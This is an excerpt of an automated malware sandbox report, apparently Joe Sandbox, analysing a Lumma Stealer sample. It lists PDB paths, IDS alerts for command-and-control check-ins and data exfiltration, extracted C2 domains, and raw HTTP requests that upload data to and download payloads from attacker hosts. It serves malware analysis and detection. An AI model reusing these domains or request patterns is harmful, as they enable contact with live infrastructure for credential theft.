Source: Binary string: wntdll.pdb; source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdbmm; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\temp\atkexComSvc\Release\aaHMLib.pdb; source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp140d.amd64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb!; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\NICInfoLib\x64\Release\NICInfoLib.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\CPUTypeCmdLib\x64\Release\CPUTypeCmdLib.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: vcruntime140d.amd64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msnmsgr.pdb; source: msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: z:\libusb\libusb\os\objfre_wxp_x86\amd64\libusb-1.0.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdbp; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\openssl-1.1.1j\libssl-1_1-x64.pdb; source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb33 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtdeclarative\qml\QtQuick\Window.2\windowplugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdbtU source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\p4clients\rel_beta\Projects\GazelleProto\Client\Engine\VC80_Release_Static\SteamEngine.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\Common.Split\NetFx\obj\Release\Microsoft.Azure.Storage.Common.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\buildworker\steam_rel_client_win32\build\src\external\SDL3\Release\SDL3.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\git\azure-storage-net-nofork\Lib\WindowsDesktop.Split\Blob\obj\Release\Microsoft.Azure.Storage.Blob.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdbF source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\VGATypeLib\x64\Release\VGATypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\UserExperienceImprovementPlugin.pdb88 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\AIControlLib\x64\Release\AIControlLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\Uninstaller\obj\x64\Release\Uninstaller.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: msn.exe, 00000027.00000002.2177671711.0000000009D57000.00000004.00000020.00020000.00000000.sdmp, msn.exe, 00000027.00000002.2183545080.000000000A0B0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdbLL source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Dropbox\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net45\Newtonsoft.Json.pdb4 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: System.Net.Http.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMSpeedLib\x64\Release\DRAMSpeedLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V5.9\Service\LogHelper\obj\Release\LogHelper.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\HardDiskCapacityLib\x64\Release\HardDiskCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Working\MB\library\ProArt MB\Release\FanProfile.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\OPHWInfo\x64\Release\OPHWInfo.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\temp\atkexComSvc\x64\Release\aaHMLib.pdb source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\projects\SDL_ttf\build-steam\RelWithDebInfo\SDL3_ttf.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B1AA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\hwcomponent\production_V5.9\Service\ServiceSDK\Release\HWComponentPlugin\HWComponentPlugin.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\workspace\sdk-for-net-publish\src\KeyVault\Microsoft.Azure.KeyVault.Core\obj\Net40-Release\Microsoft.Azure.KeyVault.Core.pdb\.~. p._CorDllMainmscoree.dll source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtbase\plugins\sqldrivers\qsqlite.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DIMMCapacityLib\x64\Release\DIMMCapacityLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DiskMediaTypeLib\x64\Release\DiskMediaTypeLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\DRAMManufacturerLib\x64\Release\DRAMManufacturerLib.pdb)) source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\cpuid2\CPUIDSDK\makefiles\win32_dll\vc2008\Release\cpuidsdk.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008654000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: vcruntime140d.amd64.pdb,,, source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\ja\workspace\common\tp-qt\979\product\webkit-vs-release\qtgraphicaleffects\qml\QtGraphicalEffects\private\qtgraphicaleffectsprivate.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\dvs\p4\build\sw\grid\oss\POCO\1.10.1-all\_out\msvc1600\x86\Release\dynamic_runtime\PocoInitializer\PocoInitializer.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Avery_IronMan\Documents\project\BigDataServer\HttpUtility\x64\Release\HttpUtilityV2.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Sql.pdb00 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_DataCollection\USBInfoLib\x64\Release\USBInfoLib.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: d:\agent\_work\4\s\binaries\amd64ret\bin\amd64\\vcruntime140_1d.amd64.pdb!!! source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5ScriptTools.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: c:\ja\workspace\common\ati-shell\3260\product\exe\vsa64\release\ti_managers_proxy_stub.pdb|| source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_InstallTools\DeviceUninstall\x64\Release\DeviceUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008ABA000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: D:\SourceCode\mb_home\production_V5.9\Service\ServiceSDK\Release\MB_Home\MB_Home.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: contactsUX.pdb source: msn.exe, 00000027.00000002.2223565420.000000005A701000.00000020.00000001.01000000.00000012.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtscript\lib\Qt5Script.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: msncore.pdb source: msn.exe, 00000027.00000002.2194406333.0000000059101000.00000020.00000001.01000000.00000010.sdmp
                Source: Binary string: D:\Jenkins\workspace\AC_LandingPageLibs\UninstallFanCtrlSvcLib\x64\Release\UninstallFanCtrlSvcLib.pdb2 source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B4E6000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ML\Code\ACUT\Server\ACUT V2.2.12.0\ACUninstallTool\x64\Release\HalUninstall.pdb source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\650429\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\650429

                Networking

                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49706 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49702 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49702 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49708 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.16:49707 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49701 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49701 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49713 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49713 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49714 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49714 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49716 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.16:49719 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49720 -> 172.67.129.49:443
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: shearhoaxx.click
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: global trafficHTTP traffic detected: GET /int_clp_pan.txt HTTP/1.1Host: kliptedehoa.shopConnection: Keep-Alive
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49701 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49706 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49707 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49702 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49704 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49708 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49709 -> 172.67.182.135:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49705 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49703 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49710 -> 45.66.248.134:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49718 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49719 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49720 -> 172.67.129.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49721 -> 172.67.182.135:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49722 -> 45.66.248.134:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0XCM0IN6W00VK5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12818Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KQ705QDAAMD4KJNEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15065Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9Y4G6U2XR1EUR4GB30PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20426Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X73TKVFD5WM1B2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1210Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V7UNCIOLTQBFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57845Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: shearhoaxx.click
                Source: global trafficHTTP traffic detected: GET /int_clp_ldr_pan.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliplorihoe0.shop
                Source: global trafficHTTP traffic detected: GET /file/Panorado.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: slotwang.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: shearhoaxx.click
